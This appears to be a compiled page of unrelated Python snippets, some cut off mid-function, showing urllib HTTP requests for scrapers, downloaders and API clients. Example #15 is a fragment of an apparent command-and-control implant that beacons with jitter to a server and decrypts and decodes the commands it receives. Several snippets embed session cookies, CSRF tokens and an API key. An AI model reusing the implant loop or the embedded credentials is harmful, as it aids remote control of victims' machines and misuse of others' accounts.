Пример #1
0
from flask import Flask, render_template
from urllib import request, parse
import json
import time

base_url = 'https://api.forismatic.com/api/1.0/'
parameters = [('method', 'getQuote'), ('format', 'json'), ('lang', 'en')]
request_url = base_url + '?' + parse.urlencode(parameters)
request_format = request.Request(request_url)
request_format.add_header('User-Agent', 'quotedaily')

# create the application object
app = Flask(__name__)


# use decorators to link the function to a url
@app.route('/')
def home():
    if time.localtime().tm_hour == 15:
        new_quote()
    quote = get_quote()
    return render_template('index.html', quote=quote[0])


def new_quote():
    url = request.urlopen(request_format).read()
    data = json.loads(url)
    with open('quote.json', 'w') as f:
        json.dump(data, f)

Пример #2
0
def url_save_chunked(url,
                     filepath,
                     bar,
                     refer=None,
                     is_part=False,
                     faker=False):
    if os.path.exists(filepath):
        if not force:
            if not is_part:
                if bar:
                    bar.done()
                print('Skipping %s: file already exists' %
                      tr(os.path.basename(filepath)))
            else:
                if bar:
                    bar.update_received(os.path.getsize(filepath))
            return
        else:
            if not is_part:
                if bar:
                    bar.done()
                print('Overwriting %s' % tr(os.path.basename(filepath)), '...')
    elif not os.path.exists(os.path.dirname(filepath)):
        os.mkdir(os.path.dirname(filepath))

    temp_filepath = filepath + '.download'
    received = 0
    if not force:
        open_mode = 'ab'

        if os.path.exists(temp_filepath):
            received += os.path.getsize(temp_filepath)
            if bar:
                bar.update_received(os.path.getsize(temp_filepath))
    else:
        open_mode = 'wb'

    if faker:
        headers = fake_headers
    else:
        headers = {}
    if received:
        headers['Range'] = 'bytes=' + str(received) + '-'
    if refer:
        headers['Referer'] = refer

    response = request.urlopen(request.Request(url, headers=headers), None)

    with open(temp_filepath, open_mode) as output:
        while True:
            buffer = response.read(1024 * 256)
            if not buffer:
                break
            output.write(buffer)
            received += len(buffer)
            if bar:
                bar.update_received(len(buffer))

    assert received == os.path.getsize(temp_filepath), '%s == %s == %s' % (
        received, os.path.getsize(temp_filepath))

    if os.access(filepath, os.W_OK):
        os.remove(
            filepath
        )  # on Windows rename could fail if destination filepath exists
    os.rename(temp_filepath, filepath)
Пример #3
0
from urllib import request, parse

values = "username:'******'123456"
data = values.encode(encoding="gb2312")
url = 'https://music.163.com/#/song?id=869785'
my_request = request.Request(url, data)
respense = request.urlopen(my_request)
print(respense.read())
while 1:
    JiCi += 1
    YouBiao.execute("select URL from URL_Ji1 where ID=" + str(JiCi))
    url = YouBiao.fetchone()
    if url != None:
        url = url[0]
    else:
        break
    try:
        #提取链接
        if re.search(r"DirectLink.direct", url) != None:
            pmbh = re.findall(r"sp=S?(\w+)&", url)[1]
            url2 = "http://www.hngp.gov.cn/wsscnew/egp/jy/xyghjy/xyghxm/xyghzy/xzsp/XyspList.html?pmbh=" + pmbh + "&cgsl=0&cgje=0.0&ppbh=null&lastcgsl=0&lastcgje=0.0&xmxh=null&xyghbh=null&isnwwbz=ww&area=00390019&czy=null&lbbs=null"
            url2 = quote(url2, '\/:?=;@&+$,%.#\n')
            Request2 = request.Request(url=url2, headers=header1)
            try:
                DaKai_url2 = request.urlopen(Request2)
            except:
                try:
                    DaKai_url2 = request.urlopen(Request2)
                except:
                    print("打开链接" + url + "超时!略过此链接!")
                    RiZhiChuLi(2, url, pmbh, url2, None)
                    continue
            BeautifulSoup2 = BeautifulSoup(DaKai_url2,
                                           "html.parser",
                                           from_encoding="utf-8")
            #列表页处理
            YeShu = BeautifulSoup2.find("span", style="float:right").get_text()
            YeShu = re.findall(r"共(\d+)页", YeShu)[0]
Пример #5
0
Файл: eyes.py Проект: xpwi/py
    # 1.日本
    # proxy = {'http': '140.227.65.196:3128'}
    # 2.俄罗斯
    proxy = {'http': '94.242.59.135:1448'}

    # 2.创建ProxyHandler
    proxy_handler = request.ProxyHandler(proxy)
    # 3.创建Opener
    opener = request.build_opener(proxy_handler)
    # 4.安装Opener
    request.install_opener(opener)

    # 下面再进行访问url就会使用代理服务器
    # 更换浏览器型号,参照:https://www.cnblogs.com/xpwi/p/9600719.html
    try:
        req = request.Request(url)
        req.add_header(
            "User-Agent",
            "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.163"
        )

        rsp = request.urlopen(req)

        html = rsp.read().decode()
        print("访问成功访客+1,以下是该网页的HTML:\n", html, "\n访问成功访客+1,以上是该网页的HTML\n")

    except error.HTTPError as e:
        print(e)

    except Exception as e:
        print(e)
Пример #6
0
###################################################
print('============= GET =============')

with request.urlopen('https://www.baidu.com') as f:
    data = f.read()
    print('Status:', f.status, f.reason)
    for k, v in f.getheaders():
        print('  %s: %s' % (k, v))
    print('Data: ', data.decode('utf-8'))

###################################################
#  添加头部
###################################################
print('============= 添加头部 =============')

req = request.Request('http://www.baidu.com')
req.add_header(
    'User-Agent',
    'Mozilla/6.0 (iPhone; CPU iPhone OS 8_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/8.0 Mobile/10A5376e Safari/8536.25'
)
with request.urlopen(req) as f:
    data = f.read()
    print('Status:', f.status, f.reason)
    for k, v in f.getheaders():
        print('  %s: %s' % (k, v))
    print('Data: ', data.decode('utf-8'))

###################################################
#  Post
###################################################
print('============= POST =============')
Пример #7
0
agent3 = "Mozilla/5.0 (Linux; U; Android 8.0.0; zh-CN; MHA-AL00 Build/HUAWEIMHA-AL00) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/57.0.2987.108 UCBrowser/12.1.4.994 Mobile Safari/537.36"
agent4 = "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36"
agent5 = "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36"
list1 = [agent1, agent2, agent3, agent4, agent5]

agent = random.choice(list1)

#构造请求头信息
header = {
    "User-Agent":
    agent,
    "Cookie":
    "__guid=54589117.3355346342630053000.1545469390794.6116; Hm_lvt_6bcd52f51e9b3dce32bec4a3997715ac=1545469392; _ga=GA1.2.525028080.1545469392; customerId=5c1dfddd1c648b470dce01bc; customerToken=7094f880-05c8-11e9-b37a-bbc022d7aefd; customerMail=; isLogin=yes; __utmz=54589117.1550903385.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=54589117.525028080.1545469392.1550986423.1551265116.3; _gid=GA1.2.1073060500.1552831283; aliyungf_tc=AQAAAD/RilUP4wcAn/Q5cZh/y5cvhjrW; connect.sid=s%3AdBSjH13Adl1RlFsC2zZlAxGDmFh2kF_F.Yf52AS5i06bgo8lsniQWt1F4NtgmI3rOrmjBIiLwR6Q; SERVER_ID=5aa5eb5e-f0eda04d; Hm_lvt_5667c6d502e51ebd8bd9e9be6790fb5d=1551698067,1551698230,1552831282,1552908428; monitor_count=29; Hm_lpvt_5667c6d502e51ebd8bd9e9be6790fb5d=1552909773"
}

titlelist = []
jianjielist = []
ulist = []

for i in urllist:
    req = request.Request(i, headers=header)
    reponse1 = request.urlopen(req).read().decode()
    data1 = re.findall(
        r'"topicTotalNum":\d+,"title":"(.{0,50}?)","columnType":\d+,"authorId":',
        reponse1)
    #data2=re.findall(r'"columnList":.*?"_id":"(.*?)"',reponse1)
    data3 = re.findall(
        r'"columnTopics":.*?([(0-9)(a-z)(A-Z)]{24}).*?,"status"', reponse1)

    print(data3)
Пример #8
0
def intormation_book(request, pagesize=24, pageno=1):
    try:
        try:
            if bool(request.GET['bool']) == True:
                pageno = int(request.GET['next_number'])
                pageno += int(request.GET['next'])
        except:
            pass
        try:
            if bool(request.GET['bool-back']) == True:
                pageno = int(request.GET['back_number'])
                pageno -= int(request.GET['back-up'])
        except:
            pass
        try:
            if pageno > int(request.GET['page_total']):
                pageno = int(request.GET['page_total'])
        except:
            pass

        informa_book_url = f'https://m.ebookservice.tw/api/3.00/ks/BookList/?pageSize=24&pageNo={pageno}&classification=TCL144&keyword='
        requests = req.Request(
            informa_book_url,
            headers={
                'cookie':
                'mid=WLsL4gAEAAGl0Wjoc8Dv6CH_iYnP; mcd=3; ds_user_id=1926542376; csrftoken=9aasLCq0vb2dUQWY9j1rjP11aejod1wS; sessionid=1926542376%3AG5zq9okSZhBxWx%3A8; ig_did=8675D711-4D34-4DBA-8751-F9E4E3B8FA63; shbid=17721; shbts=1602880097.7694821; rur=VLL; urlgen="{\"61.228.154.31\": 3462}:1kTWVn:7qfV2Cxf3rs1oZ9BUi45bNQ18T4',
                'User-Agent':
                'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.75 Safari/537.36',
            })
        with req.urlopen(requests) as response:
            data = response.read().decode('utf8')

        data = json.loads(data)
        page_total = data['TotalRecordCount']
        datas = data['List']

        book_ID_dic = {}
        for date in datas:
            book_flash = {}
            book_ID = date['TinyBook']['BookId']
            book_contents = hot_book_total_url(book_ID)
            book_contents = read_hotbook_total_url(book_contents)

            book_flash.setdefault('book_img_url', hot_book_img(book_ID))  #圖片網址
            book_flash.setdefault('TitleCache',
                                  book_contents['TitleCache'])  #標題
            book_flash.setdefault('Author', book_contents['Author'])  #作者
            book_flash.setdefault('PublisherName',
                                  book_contents['PublisherName'])  # 出版社
            book_flash.setdefault('TotalPage',
                                  book_contents['TotalPage'])  #總頁數
            book_flash.setdefault('UpdateDate',
                                  book_contents['UpdateDate'])  #上傳時間
            book_flash.setdefault('Description',
                                  book_contents['Description'])  #描述
            book_flash.setdefault('ISBN', book_contents['ISBN'])  # 書本編號

            book_ID_dic.setdefault(book_ID, book_flash)
        return render(request, 'information-book.html', {
            'book_ID_dic': book_ID_dic,
            'pageno': pageno,
            'page_total': page_total
        })
    except:
        return render(request, 'information-book.html', {'date_time': "錯誤"})
Пример #9
0
def hot_book(request,
             date_time=time.strftime(f'%Y/%m/%d', time.localtime()),
             book_number=1):
    try:
        try:
            book_number = request.GET['book_searcg']
        except:
            pass
        if time.strptime(date_time, f"%Y/%m/%d"):
            hot_book_url = f'https://m.ebookservice.tw/api/3.00/kl;taipei;nt;ty;ml;ntc;cy;cyc;tn;ks;pt;ph;il;km;hc;hcc;ylc;ntl2;tt;tcl/TclPopularBook/?beginDate={date_time}&endDate={date_time}%2023:59:59&type=book&takeSize={book_number}'
            # hot_book_url = f'https://m.ebookservice.tw/api/3.00/kl;taipei;nt;ty;ml;ntc;cy;cyc;tn;ks;pt;ph;il;km;hc;hcc;ylc;ntl2;tt;tcl/TclPopularBook/?beginDate=2020/11/5&endDate=2020/11/5%2023:59:59&type=book&takeSize={book_number}'
            requests = req.Request(
                hot_book_url,
                headers={
                    'cookie':
                    'mid=WLsL4gAEAAGl0Wjoc8Dv6CH_iYnP; mcd=3; ds_user_id=1926542376; csrftoken=9aasLCq0vb2dUQWY9j1rjP11aejod1wS; sessionid=1926542376%3AG5zq9okSZhBxWx%3A8; ig_did=8675D711-4D34-4DBA-8751-F9E4E3B8FA63; shbid=17721; shbts=1602880097.7694821; rur=VLL; urlgen="{\"61.228.154.31\": 3462}:1kTWVn:7qfV2Cxf3rs1oZ9BUi45bNQ18T4',
                    'User-Agent':
                    'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.75 Safari/537.36',
                })
            with req.urlopen(requests) as response:
                data = response.read().decode('utf8')

            datas = json.loads(data)
            datas = datas['List']
            book_ID_dic = {}
            # book_url_list= []

            for date in datas:
                book_flash = {}
                book_ID = date['TinyBook']['BookId']
                book_contents = hot_book_total_url(book_ID)
                book_contents = read_hotbook_total_url(book_contents)

                book_flash.setdefault('book_img_url',
                                      hot_book_img(book_ID))  #圖片網址
                book_flash.setdefault('TitleCache',
                                      book_contents['TitleCache'])  #標題
                book_flash.setdefault('Author', book_contents['Author'])  #作者
                book_flash.setdefault('PublisherName',
                                      book_contents['PublisherName'])  # 出版社
                book_flash.setdefault('TotalPage',
                                      book_contents['TotalPage'])  #總頁數
                book_flash.setdefault('UpdateDate',
                                      book_contents['UpdateDate'])  #上傳時間
                book_flash.setdefault('Description',
                                      book_contents['Description'])  #描述
                book_flash.setdefault('ISBN', book_contents['ISBN'])  # 書本編號

                book_ID_dic.setdefault(
                    book_ID, book_flash
                )  # {ID:[img_url,TitleCache標題,Author作者,PublisherName出版社,TotalPage總頁數,UpdateDate上傳時間,Description描述,ISBN書本編號]}
                # book_url_list.append(hot_book_img(book_ID))   'book_url_list':book_url_list #GET圖片網址

            return render(
                request, 'hot-book.html', {
                    'date_time': date_time,
                    'book_number': book_number,
                    'book_ID_dic': book_ID_dic
                })
    except:
        return render(request, 'hot-book.html', {'date_time': "錯誤"})
        headers = {
            "accept-encoding":
            "gzip, deflate",  # auto delete br encoding. cos requests and scrapy can not decode it.
            "accept-language":
            "zh-CN,zh;q=0.9",
            "accept":
            "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8",
            "user-agent":
            "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.75 Safari/537.36"
        }
        return url, headers

    method = 'GET'
    url, headers = mk_url_headers()
    body = None
    r = request.Request(url, method=method)
    for k, v in headers.items():
        if k.lower() == 'accept-encoding':
            continue  # urllib并不自动解压缩编码,所以忽略该headers字段
        r.add_header(k, v)
    s = request.urlopen(r)
    print(url)

    content = s.read()
    parser = Vparser()
    print('start')
    v = VHTML(content.decode())
    for i in v.xpath('//a/@href'):
        print(i)
    print('---- split ----')
    for i in v.xpath('//div/div/span[1][@class="wetSource"]/text()'):
Пример #11
0
def loadpage(fullurl, filename):
    print("正在下载:", filename)
    req = request.Request(fullurl, headers=header)
    resp = request.urlopen(req).read()
    return resp
Пример #12
0
 def fetch(self, url, method='GET', headers=None, body=None):
     """Perform a HTTP request and return decoded JSON data"""
     headers = headers or {}
     if self.userAgent:
         if type(self.userAgent) is str:
             headers.update({'User-Agent': self.userAgent})
         elif (type(self.userAgent) is dict) and ('User-Agent'
                                                  in self.userAgent):
             headers.update(self.userAgent)
     if len(self.proxy):
         headers.update({'Origin': '*'})
     headers.update({'Accept-Encoding': 'gzip, deflate'})
     url = self.proxy + url
     if self.verbose:
         print(url, method, url, "\nRequest:", headers, body)
     if body:
         body = body.encode()
     request = _urllib.Request(url, body, headers)
     request.get_method = lambda: method
     response = None
     text = None
     try:  # send request and load response
         handler = _urllib.HTTPHandler if url.startswith(
             'http://') else _urllib.HTTPSHandler
         opener = _urllib.build_opener(handler)
         response = opener.open(request, timeout=int(self.timeout / 1000))
         text = response.read()
     except socket.timeout as e:
         raise RequestTimeout(' '.join(
             [self.id, method, url, 'request timeout']))
     except ssl.SSLError as e:
         self.raise_error(ExchangeNotAvailable, url, method, e)
     except _urllib.HTTPError as e:
         error = None
         details = text if text else None
         if e.code == 429:
             error = DDoSProtection
         elif e.code in [404, 409, 500, 501, 502, 521, 522, 525]:
             details = e.read().decode('utf-8', 'ignore') if e else None
             error = ExchangeNotAvailable
         elif e.code in [400, 403, 405, 503]:
             # special case to detect ddos protection
             reason = e.read().decode('utf-8', 'ignore')
             ddos_protection = re.search('(cloudflare|incapsula)',
                                         reason,
                                         flags=re.IGNORECASE)
             if ddos_protection:
                 error = DDoSProtection
             else:
                 error = ExchangeNotAvailable
                 details = '(possible reasons: ' + ', '.join([
                     'invalid API keys',
                     'bad or old nonce',
                     'exchange is down or offline',
                     'on maintenance',
                     'DDoS protection',
                     'rate-limiting',
                     reason,
                 ]) + ')'
         elif e.code in [408, 504]:
             error = RequestTimeout
         elif e.code in [401, 422, 511]:
             error = AuthenticationError
         self.raise_error(error, url, method, e, details)
     except _urllib.URLError as e:
         self.raise_error(ExchangeNotAvailable, url, method, e)
     encoding = response.info().get('Content-Encoding')
     if encoding in ('gzip', 'x-gzip', 'deflate'):
         if encoding == 'deflate':
             text = zlib.decompress(text, -zlib.MAX_WBITS)
         else:
             data = gzip.GzipFile('', 'rb', 9, io.BytesIO(text))
             text = data.read()
     body = text.decode('utf-8')
     if self.verbose:
         print(method, url, "\nResponse:", headers, body)
     return self.handle_response(url, method, headers, body)
Пример #13
0
Файл: rest.py Проект: openmsa/NO
    def __execute(self, http_method, url, basic_auth,
                        query_params, post_params):

        passwords = []

        if len(url) == 0:
            raise SystemError('url required')

        if len(query_params) > 0:
            url += '?' + parse.urlencode(query_params)

        if post_params == None:
            request_body = ''
        else:
            request_body = json.dumps(post_params)

        request_body = request_body.encode(self.char_code)

        http_header = {
            'Content-Type': self.CONTENT_TYPE,
            'Content-Length': str(len(request_body))
        }

        if len(basic_auth) > 0:
            passwords.append(basic_auth['pass'])
            authorization = basic_auth['id'] + ':' + basic_auth['pass']
            http_header['Authorization'] = 'Basic ' + base64.b64encode(
                        authorization.encode(self.char_code)).decode('ascii')

        # Output Log(MSA Request)
        log_msg = '[MSA Request]'
        log_msg += '[METHOD]' + http_method
        log_msg += '[URL]' + url
        log_msg += '[HEADER]' + json.dumps(http_header)
        log_msg += '[PARAMS]' + json.dumps(post_params)
        self.logger.log_info(__name__, log_msg, passwords)

        req = request.Request(url, headers=http_header, data=request_body)
        req.method = http_method

        with request.urlopen(req) as res:
            response_params = res.read().decode(self.char_code)

        # Output Log(MSA Response)
        log_msg = '[NSA Response]'
        log_msg += '[STATUS]' + str(res.getcode())
        log_msg += '[HEADER]' + str(res.headers)
        log_msg += '[PARAMS]' + response_params
        self.logger.log_info(__name__, log_msg, passwords)

        if len(response_params) > 0:

            try:
                response_params = json.loads(response_params)

            except json.decoder.JSONDecodeError:
                raise SystemError(response_params)

            except:
                raise

        return response_params
Пример #14
0
    def saveResult(self, run, task):
        taskKey = task['key']
        log_file = run['logFile']
        headers = {'Accept':'text/plain'}

        fileNames = []
        for file in task['files']:
            fileNames.append(file['name'])

        try:
            util.write_file(json.dumps(task), log_file+'.stdOut')
        except:
            logging.debug('Could not save task '+taskKey)

        statisticsProcessed = False
        if APPENGINE_SETTINGS['statisticsFileName'] in fileNames:
            try:
                uri = self.benchmark.config.appengineURI+'/tasks/'+taskKey+'/files/' + APPENGINE_SETTINGS['statisticsFileName']
                request = urllib2.Request(uri, headers=headers)
                response = urllib2.urlopen(request).read().decode()
                util.write_file(response, log_file)
                statisticsProcessed = True
            except:
                statisticsProcessed = False
                logging.exception('Could not save statistics of'+taskKey)
        else:
            statisticsProcessed = True


        if APPENGINE_SETTINGS['errorFileName'] in fileNames:
            try:
                uri = self.benchmark.config.appengineURI+'/tasks/'+taskKey+'/files/' + APPENGINE_SETTINGS['errorFileName']
                request = urllib2.Request(uri, headers=headers)
                response = urllib2.urlopen(request).read().decode()
                response = 'Task Key: {}\n{}'.format(task['key'], response)
                util.write_file(response, log_file+'.stdErr')
            except:
                logging.exception('Error while retrieving result file for '+taskKey)

        headers = {'Content-type':'application/json', 'Accept':'application/json'}
        markedAsProcessed = False
        if statisticsProcessed:
            try:
                uri = self.benchmark.config.appengineURI+'/tasksets/'+self.tasksetKey+'/tasks'
                request = urllib2.Request(uri, json.dumps([taskKey]).encode(), headers=headers)
                request.get_method = lambda: 'PUT'
                urllib2.urlopen(request)
                self.finishedTasks += 1
                markedAsProcessed = True
                logging.info('Stored result of task {0} in file {1}'.format(taskKey, log_file))
                try:
                    with open(self.benchmark.output_base_name+'.Processed_Tasks.txt', 'a') as f:
                        f.write(taskKey+'\n')
                except: pass
                logging.debug('Task {} finished. Status: {}'.format(taskKey, task['status']))
            except:
                logging.debug('The task {} could not be marked as processed.'.format(taskKey))

        if self.benchmark.config.appengineDeleteWhenDone and markedAsProcessed:
            try:
                uri = self.benchmark.config.appengineURI+'/tasks/'+taskKey
                request = urllib2.Request(uri, headers=headers)
                request.get_method = lambda: 'DELETE'
                urllib2.urlopen(request).read()
            except:
                logging.exception('The task {} could not be deleted.'.format(taskKey))
Пример #15
0
  infile = StringIO.StringIO(data[16:])
  with gzip.GzipFile(fileobj=infile, mode="r") as f:
    data = f.read()
  return data

while(True):
  cstr=time.strftime("%%Y-%%m-%%d",time.gmtime());cstr=time.strptime(cstr,"%%Y-%%m-%%d")
  if cstr < kd:
    key = "%s"
    uri = "%s"
    server = "%%s/%%s%%s" %% (serverclean[0], random.choice(urls), uri)
    try:
      this_timer = random.randint(timer * (1 - jitter), timer * (1 + jitter))
      time.sleep(this_timer)
      ua='%s'
      if hh[0]: req=urllib2.Request(server,headers={'Host':hh[0],'User-agent':ua})
      else: req=urllib2.Request(server,headers={'User-agent':ua})
      res=urllib2.urlopen(req)
      html = res.read().decode("utf-8")
    except Exception as e:
      print("error %%s" %% e)
    if html:
      try:
        returncmd = decrypt(key, html)
        returncmd = returncmd.rstrip('\\0')
        returncmd = base64.b64decode(returncmd).decode("utf-8")
        if "multicmd" in returncmd:
          returncmd = returncmd.replace("multicmd","")
          returnval = ""
          splits = returncmd.split("!d-3dion@LD!-d")
Пример #16
0
from urllib import request, parse
req = request.Request('http://www.baidu.com')  # 加入协议头, 模仿浏览器浏览网页
req.add_header('User-Agent', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Maxthon/4.9.3.1000 Chrome/39.0.2146.0 Safari/537.36')
resp = request.urlopen(req)
print(resp)
print(help(request.urlopen))

print('________________________________________________________________________________')
Пример #17
0
    """
    turns an int into a human reable byte size without the need of an external module
    found there : http://code.activestate.com/recipes/577081-humanized-representation-of-a-number-of-bytes/
    """
    suffixes = ['B', 'KB', 'MB', 'GB', 'TB']
    suffixIndex = 0
    while size > 1024:
        suffixIndex += 1  #increment the index of the suffix
        size = size / 1024.0  #apply the division
    return '{0:.{1}f} {2}'.format(size, precision, suffixes[suffixIndex])


print('Connecting to ebi public FTP server...')
## get ml_file_extensions via http
study_url = 'http://ftp.ebi.ac.uk/pub/databases/metabolights/study_file_extensions/ml_file_extension.json'
req = rq.Request(study_url)
con = rq.urlopen(req)

## get studies containing mzML
e = json.JSONDecoder()
study = e.decode(con.read().decode('utf-8'))
mzml_studies = [k['id'] for k in study if '.mzML' in k['extensions']]

## create output folder
if not os.path.isdir('example_files/metabolights'):
    os.mkdir('example_files/metabolights')
os.chdir('example_files/metabolights')

## start ftp session
ftp = ftplib.FTP('ftp.ebi.ac.uk')
ftp.login()
Пример #18
0
from urllib import request

req = request.Request('http://www.douban.com')
req.add_header('User-Agent', 'Mozilla/6.0 (iPhone; CPU iPhone OS 8_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/8.0 Mobile/10A5376e Safari/8536.25')
with request.urlopen(req) as f:
    print('Status:', f.status, f.reason)
    for k, v in f.getheaders():
        print('%s: %s' % (k, v))
    print('Data:', f.read().decode('utf-8'))
Пример #19
0
import urllib.request as req
import matplotlib.pyplot as plt


def inputstock(url):
    url = "https://histock.tw/stock/financial.aspx?no=" + url + "&t=2"


url = "https://histock.tw/stock/financial.aspx?no=2887&t=2"

#附加headers 偽裝一般使用者
request = req.Request(
    url,
    headers={
        "user-agent":
        "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36"
    })

with req.urlopen(request) as response:
    data = response.read().decode("utf-8")
# print(data)
#解析原始碼
import bs4
root = bs4.BeautifulSoup(data, "html.parser")

EPS_5Y = []


def inputstock(url):
    url = "https://histock.tw/stock/financial.aspx?no=" + url + "&t=2"
Пример #20
0
def mesaj_gonder(isim, mesaj):
    data = json.dumps({"message":mesaj, "sender":isim}).encode()
    rq = request.Request(url, data, headers={'content-type': 'application/json'})
    response = request.urlopen(rq)
    return json.loads(response.read().decode())
Пример #21
0
#!/usr/bin/env python
# coding:utf-8

from urllib import request

with request.urlopen('http://news-at.zhihu.com/api/4/news/latest') as f:
    # Zhihu Daily newest feed API
    data = f.read()
    print('Status:', f.status, f.reason)
    print()
    for k, v in f.getheaders():
        print('{0}: {1}'.format(k, v))
    print("################################################################")
    print('Data:', data.decode('utf-8'))

print("################################################################")

req = request.Request('http://daily.zhihu.com/')
# Zhihu Daily frontpage
req.add_header(
    'User-Agent',
    'Mozilla/6.0 (iPhone; CPU iPhone OS 8_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/8.0 Mobile/10A5376e Safari/8536.25'
)
# add header; request for iPhone version page
with request.urlopen(req) as f:
    print('Status:', f.status, f.reason)
    for k, v in f.getheaders():
        print('{0}: {1}'.format(k, v))
    print("################################################################")
    print('Data:', f.read().decode('utf-8'))
def GetScenes():
    req = urllib2.Request('http://localhost:8080/json.htm?type=scenes')
    resp = rullib2.urlopen(req)
    data = resp.read()
    data = json.loads(data)
    return data
Пример #23
0
from urllib import request
url = "http://www.baidu.com"
#添加header信息反扒措施
header = {
    "User-Agent":"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.182 Safari/537.36"
}
req = request.Request(url,headers=header)
res = request.urlopen(req)
html = res.read();
html = str(html,encoding='utf-8')
print(str(html))
Пример #24
0
def index(request, lang="EN"):
    #template = loader.get_template('cv_parser/index.html')
    language = "Français"
    language_code = "fr"
    languages = {'language': 'English', 'code': 'us', 'link': 'EN'}
    if lang == "FR":
        with open("cv_parser/fr.json", 'r') as config:
            json_config = json.loads(config.read())
            config.close()
    elif lang == "EN":
        language = "English"
        languages = {'language': 'Français', 'code': 'fr', 'link': 'FR'}
        language_code = "us"
        with open("cv_parser/en.json", 'r') as config:
            json_config = json.loads(config.read())
            config.close()
    else:
        with open("cv_parser/fr.json", 'r') as config:
            json_config = json.loads(config.read())
            config.close()
    #with open("cv_parser/cache.json","r") as cache_file:
    #	json_cache=json.loads(cache_file.read())
    #	cache_file.close()
    #hash_of_adress = json_config["contact"]["adress"].encode("utf-8")
    #hash_of_adress = hashlib.md5(hash_of_adress).hexdigest()

    #if json_cache["adress"] != hash_of_adress:
    try:
        cmap = CenterMap(address=json_config["contact"]["adress"],
                         zoom=15,
                         key="AIzaSyCKM9tkv_Rc9fMhuwLhwNwvW8C9Y6hNuNg=")
        requ = req.Request(cmap.generate_url())
        pic = req.urlopen(requ)

        filePath = 'cv_parser/static/cv_parser/images/static_map.png'
        with open(filePath, 'wb') as localFile:
            localFile.write(pic.read())
            #json_cache["adress"] = hash_of_adress
            #with open("cv_parser/cache.json","w") as cache_file:
            #	json.dump(json_cache, cache_file)
            #	cache_file.close()
    except:
        print(
            "Error getting map image , put it manually in cv_parser/static/cv_parser/images/static_map.png"
        )

    #hash_of_config = json.dumps(json_config, sort_keys = True).encode("utf-8")
    #hash_of_config = hashlib.md5(hash_of_config).hexdigest()
    #logger.info(json_cache[lang.lower()+"_pdf_hash"])
    #logger.info(hash_of_config)
    #if json_cache[lang.lower()+"_pdf_hash"] != hash_of_config:
    template.create_template(json_config)
    #logger.info("new json")
    #json_cache[lang.lower()+"_pdf_hash"] = hash_of_config
    #with open("cv_parser/cache.json","w") as cache_file:
    #	json.dump(json_cache, cache_file)
    #	cache_file.close()

    # urllib.urlretrieve(self.url, filePath)

    return render(
        request, 'cv_parser/index.html', {
            'config': json_config,
            'language': language,
            'language_code': language_code,
            'languages': languages
        })
Пример #25
0
def url_save(url, filepath, bar, refer=None, is_part=False, faker=False):
    file_size = url_size(url, faker=faker)

    if os.path.exists(filepath):
        if not force and file_size == os.path.getsize(filepath):
            if not is_part:
                if bar:
                    bar.done()
                print('Skipping %s: file already exists' %
                      tr(os.path.basename(filepath)))
            else:
                if bar:
                    bar.update_received(file_size)
            return
        else:
            if not is_part:
                if bar:
                    bar.done()
                print('Overwriting %s' % tr(os.path.basename(filepath)), '...')
    elif not os.path.exists(os.path.dirname(filepath)):
        os.mkdir(os.path.dirname(filepath))

    temp_filepath = filepath + '.download'
    received = 0
    if not force:
        open_mode = 'ab'

        if os.path.exists(temp_filepath):
            received += os.path.getsize(temp_filepath)
            if bar:
                bar.update_received(os.path.getsize(temp_filepath))
    else:
        open_mode = 'wb'

    if received < file_size:
        if faker:
            headers = fake_headers
        else:
            headers = {}
        if received:
            headers['Range'] = 'bytes=' + str(received) + '-'
        if refer:
            headers['Referer'] = refer

        response = request.urlopen(request.Request(url, headers=headers), None)
        try:
            range_start = int(response.headers['content-range'][6:].split('/')
                              [0].split('-')[0])
            end_length = end = int(
                response.headers['content-range'][6:].split('/')[1])
            range_length = end_length - range_start
        except:
            range_length = int(response.headers['content-length'])

        if file_size != received + range_length:
            received = 0
            if bar:
                bar.received = 0
            open_mode = 'wb'

        with open(temp_filepath, open_mode) as output:
            while True:
                buffer = response.read(1024 * 256)
                if not buffer:
                    if received == file_size:  # Download finished
                        break
                    else:  # Unexpected termination. Retry request
                        headers['Range'] = 'bytes=' + str(received) + '-'
                        response = request.urlopen(
                            request.Request(url, headers=headers), None)
                output.write(buffer)
                received += len(buffer)
                if bar:
                    bar.update_received(len(buffer))

    assert received == os.path.getsize(temp_filepath), '%s == %s == %s' % (
        received, os.path.getsize(temp_filepath), temp_filepath)

    if os.access(filepath, os.W_OK):
        os.remove(
            filepath
        )  # on Windows rename could fail if destination filepath exists
    os.rename(temp_filepath, filepath)
Пример #26
0
header = {
    'User-Agent':
    'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36'
}
url = 'http://fanyi.youdao.com/translate?smartresult=dict&smartresult=rule'
#post请求需要提交的参数
formdata = {
    'i': key,
    'from': 'AUTO',
    'to': 'AUTO',
    'smartresult': 'dict',
    'client': 'fanyideskweb',
    'salt': '15814112793734',
    'sign': 'b54a57150836a4b5aede88441e12a9c1',
    'ts': '1581411279373',
    'bv': '37074a7035f34bfbf10d32bb8587564a',
